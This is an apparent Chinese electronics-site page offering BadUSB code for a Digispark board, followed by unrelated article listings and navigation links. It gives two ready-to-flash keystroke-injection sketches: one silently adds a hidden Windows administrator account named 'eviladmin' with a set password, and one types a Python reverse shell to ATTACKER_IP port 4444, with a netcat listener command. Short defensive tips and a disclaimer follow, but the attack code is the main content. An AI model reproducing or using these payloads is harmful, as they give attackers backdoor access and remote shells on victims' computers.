badusb 代码
BadUSB 是一种利用 USB 设备的固件漏洞,伪装成键盘输入恶意指令的攻击方式。以下是两个典型场景的示例代码(请仅用于学习研究,禁止非法使用):
场景1:Windows 系统提权后门 (Arduino Digispark)
#include <DigiKeyboard.h>
void setup() {
DigiKeyboard.sendKeyStroke(0); // 初始化
DigiKeyboard.delay(500);
// 打开cmd(管理员权限)
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); // Win+R
DigiKeyboard.delay(300);
DigiKeyboard.print("cmd /k mode con: cols=15 lines=1");
DigiKeyboard.sendKeyStroke(KEY_ENTER, MOD_ALT_LEFT | MOD_SHIFT_LEFT);
DigiKeyboard.delay(800);
// 添加隐藏管理员账户
DigiKeyboard.print("net user eviladmin MyP@ssw0rd! /add /y");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(300);
DigiKeyboard.print("net localgroup administrators eviladmin /add");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(300);
// 隐藏执行痕迹
DigiKeyboard.print("exit");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
}
void loop() {} // 仅执行一次
攻击效果:
- 静默创建管理员账户
eviladmin,密码MyP@ssw0rd! - 窗口伪装成单行模式减少注意
- 自动关闭CMD窗口
场景2:Linux 反向 Shell (Python + Bash)
#include <DigiKeyboard.h>
void setup() {
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(1000);
// 打开终端 (Ubuntu/Debian)
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(500);
DigiKeyboard.print("python3 -c 'import socket,subprocess,os;");
DigiKeyboard.print("s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);");
DigiKeyboard.print("s.connect((\"ATTACKER_IP\",4444));");
DigiKeyboard.print("os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);");
DigiKeyboard.print("subprocess.call([\"/bin/sh\",\"-i\"])'");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
}
void loop() {}
替换参数:
ATTACKER_IP→ 攻击者服务器IP- 需在攻击端用
nc -lvp 4444监听
防御建议(针对受害者):
- 禁用自动运行:组策略中关闭USB自动执行
- 设备白名单:使用USB管理软件限制未知设备
- 物理防护:重要设备禁用USB接口或用Kensington锁
- 权限控制:日常使用非管理员账户
⚠️ 重要提醒:上述代码演示攻击原理,实际使用违反法律。安全研究需在授权环境下进行。
静态代码块、构造代码块、构造函数及普通代码块的执行顺序
在Java中,静态代码块、构造代码块、构造函数、普通代码块的执行顺序是一个笔试的考点,通过这篇文章希望大家能彻底了解它们之间的执行顺序。 1、静
2023-10-09 15:40:56
Klocwork——支持DevOps和功能安全/信息安全的静态代码分析器
1970-01-01 08:00:00 至 1970-01-01 08:00:00
结合动态行为和机器学习的恶意代码检测方法
目前恶意代码出现频繁且抗识别性加强,现有基于签名的恶意代码检测方法无法识别未知与隐藏的恶意代码。提出一种结合动态行为和机器学习的恶意
资料下载
佚名
2021-03-23 16:24:19
VectorCAST—嵌入式代码自动化测试工具
1970-01-01 08:00:00 至 1970-01-01 08:00:00
Helix QAC 企业级代码静态测试工具
1970-01-01 08:00:00 至 1970-01-01 08:00:00
微软最新写代码神器代码之旅
【导语】:CodeTour(代码之旅)是微软官方开发的 VS Code 扩展,允许记录和回放代码的演练和思路。 简介 CodeTour 是一个 VS Code 插件,允许记录和回放
2021-10-26 10:00:55
USB-HID真的有用吗
0 引言从2014年BADUSB出现以后,USB-HID攻击就这一直被关注,且具争议。争议的焦点是USB-HID的实战效果过于“鸡肋”,无论从早期的BADUSB,还是到后来的各种USB-HID设备
TPYBoard实例之利用WHID为隔离主机建立隐秘通道 精选资料分享
引言 从2014年BADUSB出现以后,USB-HID攻击就这一直被关注,且具争议。争议的焦点是USB-HID的实战效果过于“鸡肋”,无论从早期的BADUSB,还是到后来的各种USB-HID设备,对于目标机来说,都
TouchGFX代码框架以及如何添加用户代码
1. 摘要 本文档主要介绍,TouchGFX代码框架以及如何添加用户代码。 2. 准备工作 可以正常运行的TouchGFX工程 3. 代码结构
2021-01-18 11:28:58
换一换
- 如何分清usb-c和type-c的区别
- 中国芯片现状怎样?芯片发展分析
- vga接口接线图及vga接口定义
- 芯片的工作原理是什么?
- 华为harmonyos是什么意思,看懂鸿蒙OS系统!
- 什么是蓝牙?它的主要作用是什么?
- ssd是什么意思
- 汽车电子包含哪些领域?
- TWS蓝牙耳机是什么意思?你真的了解吗
- 什么是单片机?有什么用?
- 升压电路图汇总解析
- plc的工作原理是什么?
- 再次免费公开一肖一吗
- 充电桩一般是如何收费的?有哪些收费标准?
- ADC是什么?高精度ADC是什么意思?
- dtmb信号覆盖城市查询
- EDA是什么?有什么作用?
- 中科院研发成功2nm光刻机
- 苹果手机哪几个支持无线充电的?
- type-c四根线接法图解
- 华为芯片为什么受制于美国?
- 怎样挑选路由器?
- 元宇宙概念股龙头一览
- 锂电池和铅酸电池哪个好?
- 什么是场效应管?它的作用是什么?
- 如何进行编码器的正确接线?接线方法介绍
- 虚短与虚断的概念介绍及区别
- 晶振的作用是什么?
- 大疆无人机的价格贵吗?大约在什么价位?
- 苹果nfc功能怎么复制门禁卡
- amoled屏幕和oled区别
- 单片机和嵌入式的区别是什么
- 复位电路的原理及作用
- BLDC电机技术分析
- dsp是什么意思?有什么作用?
- 苹果无线充电器怎么使用?
- iphone13promax电池容量是多少毫安
- 芯片的组成材料有什么
- 特斯拉充电桩充电是如何收费的?收费标准是什么?
- 直流电机驱动电路及原理图
- 传感器常见类型有哪些?
- 自举电路图
- 通讯隔离作用
- 苹果笔记本macbookpro18款与19款区别
- 新斯的指纹芯片供哪些客户
- 伺服电机是如何进行工作的?它的原理是什么?
- 无人机价钱多少?为什么说无人机烧钱?
- 以太网VPN技术概述
- 手机nfc功能打开好还是关闭好
- 十大公认音质好的无线蓝牙耳机